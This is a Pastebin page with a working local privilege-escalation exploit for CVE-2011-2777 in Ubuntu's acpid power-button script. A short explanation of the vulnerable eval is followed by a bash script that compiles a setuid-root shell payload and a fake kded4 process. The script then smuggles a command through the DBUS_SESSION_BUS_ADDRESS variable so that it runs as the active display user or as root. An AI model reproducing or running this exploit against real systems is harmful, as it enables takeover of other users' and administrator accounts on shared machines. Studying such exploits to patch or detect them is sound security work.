Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exploit Title: Acpid Privilege Boundary Crossing Vulnerability
- Google Dork:
- Date: 23-11-2011
- Author: otr
- Software Link: https://launchpad.net/ubuntu/+source/acpid
- Version: 1:2.0.10-1ubuntu2
- Tested on: Ubuntu 11.10, Ubuntu 11.04
- CVE : CVE-2011-2777
- --
- Safeguard this letter, it may be an IMPORTANT DOCUMENT
- #!/bin/bash
- #
- # otr
- #
- # The following script is executed when pressing the power button on an Ubuntu
- # 11.10 system. Depending on how far we get in the condition in the code
- # fragement, it is possible for another user on the local system to gain the
- # privileges of the user who has the currently focused display running. The
- # vulnerability only triggers when certain power management programms are not
- # running, especially kded4 and the programms in the $PMS variable need not to
- # be running in order for this to be exploitable.
- #
- # This exploit would be more reliable when having a way to dos
- # gnome-power-manager Also it would be more fun one could trick the getXuser
- # function into setting $XUSER to root. In the case of root being the user on
- # the active display this exploit turns into a privilege escalation
- #
- # Exploitable file /etc/acpi/powerbtn.sh
- # In original source code line 40
- #
- # --
- # PMS="gnome-power-manager kpowersave xfce4-power-manager"
- # PMS="$PMS guidance-power-manager.py dalston-power-applet"
- #
- # if pidof x $PMS > /dev/null ||
- # ( test "$XUSER" != "" && \
- # pidof dcopserver > /dev/null && \
- # test -x /usr/bin/dcop && \
- # /usr/bin/dcop --user $XUSER kded kded loadedModules \
- # | grep -q klaptopdaemon) ||
- # ( test "$XUSER" != "" && \
- # test -x /usr/bin/qdbus && \
- # test -r /proc/$(pidof kded4)/environ && \
- # su - $XUSER -c \
- # "eval $(echo -n 'export '; cat /proc/$(pidof kded4)/environ | \
- # tr '\0' '\n' | \
- # grep DBUS_SESSION_BUS_ADDRESS); \
- # qdbus org.kde.kded" | \
- # grep -q powerdevil) ;\
- # then
- # --
- #
- # The problem here is that the output of cat /proc/$(pidof kded4)/environ is
- # controllable by a local user by exporting the DBUS_SESSION_BUS_ADDRESS
- # variable and running a programm called kded4.
- # Using this environment variable the attack is able to inject arbitrary shell
- # commands into the eval expression which will be executed with the rights
- # of $XUSER which is the user with the currently active display.
- #
- # /usr/share/acpi-support/policy-funcs in the PowerDevilRunning function
- # has similar code but it seems that under normal conditions this only
- # allows to run code with the privileges one already has.
- PAYLOADEXE="/var/crash/payload"
- PAYLOADC="/var/crash/payload.c"
- KDEDC="kded4.c"
- KDEDEXE="kded4"
- TRIGGER="/etc/acpi/powerbtn.sh"
- rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
- echo "[+] Setting umask to 0 so we have world writable files."
- umask 0
- echo "[+] Preparing binary payload."
- # we _try_ to get a suid root shell, if not we only get a
- # shell for another user
- cat > $PAYLOADC <<_EOF
- #include <sys/stat.h>
- void main(int argc, char **argv)
- {
- if(!strstr(argv[0],"shell")){
- printf("[+] Preparing suid shell.\n");
- system("cp /var/crash/payload /var/crash/shell");
- setuid(0);
- setgid(0);
- chown ("/var/crash/shell", 0, 0);
- chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
- }else{
- execl("/bin/sh", "/bin/sh", "-i", 0);
- }
- }
- _EOF
- gcc -w -o $PAYLOADEXE $PAYLOADC
- echo "[+] Preparing fake kded4 process."
- cat > $KDEDC <<_EOF
- #include <unistd.h>
- void main (){
- while(42){
- sleep(1);
- if( access( "/var/crash/shell" , F_OK ) != -1 ) {
- execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
- exit(0);
- }
- }
- }
- _EOF
- gcc -w -o $KDEDEXE $KDEDC
- rm -f $KDEDC $PAYLOADC
- echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
- export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
- echo "[+] Starting kded4."
- echo "[+] Trying to PMS the system."
- echo "[+] Waiting for the power button to be pressed."
- echo "[+] You'll get a shell on this console."
- ./$KDEDEXE
- rm $KDEDEXE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement